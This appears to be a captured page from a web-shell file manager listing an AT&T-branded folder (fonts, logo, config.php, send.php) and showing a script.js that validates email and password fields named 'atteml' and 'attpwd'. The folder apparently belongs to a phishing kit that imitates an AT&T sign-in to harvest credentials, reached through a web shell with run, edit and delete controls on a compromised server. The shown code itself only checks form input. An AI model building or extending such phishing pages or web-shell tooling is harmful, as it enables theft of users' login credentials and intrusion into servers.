at path:
ROOT
/
att
/
assets
/
script.js
run:
R
W
Run
ATTAleckSans_W_Md.woff
23.36 KB
2021-11-03 18:23:32
R
W
Run
Delete
Rename
ATTAleckSans_W_Rg.woff
22.32 KB
2021-11-03 18:23:32
R
W
Run
Delete
Rename
conf.php
131 By
2025-09-13 22:59:40
R
W
Run
Delete
Rename
config.php
1.43 KB
2025-09-13 23:00:22
R
W
Run
Delete
Rename
errornew.svg
587 By
2021-11-03 18:23:32
R
W
Run
Delete
Rename
logo.svg
8.17 KB
2021-11-03 18:23:32
R
W
Run
Delete
Rename
script.js
712 By
2025-09-13 23:19:10
R
W
Run
Delete
Rename
send.php
131 By
2026-01-03 04:34:22
R
W
Run
Delete
Rename
style.css
5.6 KB
2025-09-07 19:52:06
R
W
Run
Delete
Rename
error_log
up
📄
script.js
Save
$(document).ready(function(){ $('#atteml').focus(); $('#atteml').on('input',function(){ $('#err').fadeOut(); $('#atteml').css('border','1px solid #797e85'); }); $('#attpwd').on('input',function(){ $('#err').fadeOut(); $('#attpwd').css('border','1px solid #797e85'); }); var atteml = $('#atteml').val(); var attpwd = $('#attpwd').val(); if(atteml === "") { $('#err').css('display', 'flex'); $('#atteml').css('border','1px solid #c70032'); $('#atteml').focus(); }else if(atteml !== "" && attpwd === "") { $('#err').css('display', 'flex'); $('#attpwd').css('border','1px solid #c70032'); $('#attpwd').focus(); } });